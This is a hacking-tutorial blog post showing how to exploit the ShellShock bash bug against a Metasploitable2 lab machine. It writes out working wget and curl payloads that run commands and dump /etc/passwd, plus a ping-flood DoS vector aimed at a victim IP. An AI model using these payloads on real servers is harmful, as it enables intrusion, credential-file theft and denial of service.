Tutorials

ShellShock Vulnerability Exploitation With HTTP Request

In a previous tutorial, we used Metasploit Framework to gain a low-level shell on the target system by exploiting the ShellShock vulnerability. The same can also be done by sending a HTTP Request with Wget and Curl.

In order to exploit the ShellShock bug, the following steps need to occur:

  • you must get the target server to inject a specific string into an environment variable, and
  • after setting the environment variable, the target must (directly or indirectly) launch (a vulnerable version of) the bash shell.

To better understand the implications of such bug, create a simple bash file with the following content and save it inside /usr/lib/cgi-bin directory.

Here, we’re using the same Metasploitable2 Vulnerable Machine for this demonstration whose IP Address is 192.168.20.128.

Command: cd /usr/lib/cgi-bin
Command: sudo nano yeahhub.sh

Code:

#! /bin/bash
echo “Content-type: text/html”
echo “”
echo “Hello yeahhub.com”

And give 755 Permission to yeahhub.sh file by typing “sudo chmod 755 yeahhub.sh

The file can be easily accessed at “http://192.168.20.128/cgi-bin/yeahhub.sh” in any browser.

The easiest way to test a web server via HTTP request is to inject the bash command through the user agent.

Command: wget -U ‘() { :;}; /bin/bash -c “echo vulnerable”‘ http://192.168.20.128/cgi-bin/yeahhub.sh

If a 5XX server error is generated, it means that the server is probably vulnerable to an exploit.

You can also test the same by sending a request with CURL command:

Command: curl -A ‘() { :;}; /bin/bash -c “echo vulnerable”‘ http://192.168.20.128/cgi-bin/yeahhub.sh

Now call it with wget to swap out the User Agent string which actually shows the content of /etc/passwd file.

Command: wget -U “() { test;};echo \”Content-type: text/plain\”; echo; echo; /bin/cat /etc/passwd” http://192.168.20.128/cgi-bin/yeahhub.sh

The above command will fetch all the contents of /etc/passwd file of your target machine (i.e. Metasploitable2) and save it with name yeahhub.sh (plain text file) as shown below:

If you further debug the above command, then the output will react like this:

() {
test
}
echo \”Content-type: text/plain\”
echo
/bin/cat /etc/passwd

The extra “Content-type:” is only for illustration. It prevents the 500 error and shows the contents of the file. The above example also shows how it’s not a problem of programming errors, even normally safe and harmless bash cgi which doesn’t even take user input can be exploited.

Similarly, you can do N number of things with your target.

For Example – If you simply want to ping someone’s IP as an attack bot which could further lead to DOS Attack, then the attack vector will be:

() { :; }; ping -s 1000000 <victim IP>

You can also use an open source shellshocker.py script which is a command line tool for doing testing and a deployable flask-powered shellshock testing website.

Command: git clone https://github.com/liamim/shellshocker.git

ShellShocker has two different ways of being run:

  • a command line utility, and
  • a web interface, which is was deployed to Heroku

To test against your target, type the following command:

Command: python shellshocker.py <your-target-domain>

Exploitation of ShellShock with CURL – 

Let’s send the malicious request via CURL to your target machine which is vulnerable to ShellShock Vulnerability.

Command: curl -v http://192.168.20.128/cgi-bin/yeahhub.sh -H “custom:() { ignored; }; /usr/bin/id”

As you can see that, the response code is 500, Internal Server Error, it means that your target server is Vulnerable as above discussed but where /usr/bin/id command has been executed ?

For this, you need to check your apache logs –

The bit of “header” it;s complaining is bad is the result of the id command.

Similarly, if you want to access or view the /etc/passwd file, then the command will be:

Command: curl http://192.168.20.128/cgi-bin/yeahhub.sh -H “custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd “

 

Have something to say about this article? Comment below or share it with us on Facebook or Twitter.

H4ck0
Step by step hacking tutorials about wireless cracking, kali linux, metasploit, ethical hacking, seo tips and tricks, malware analysis and scanning.
https://www.yeahhub.com/

WHERE SHOULD WE SEND

HACKING TUTORIALS & INFOSEC NEWS?

Subscribe to Our Newsletter and Get Instant Delivered to Your Email Inbox.

We respect your privacy and take protecting it seriously.

Leave a Reply

Your email address will not be published. Required fields are marked *

fifteen − thirteen =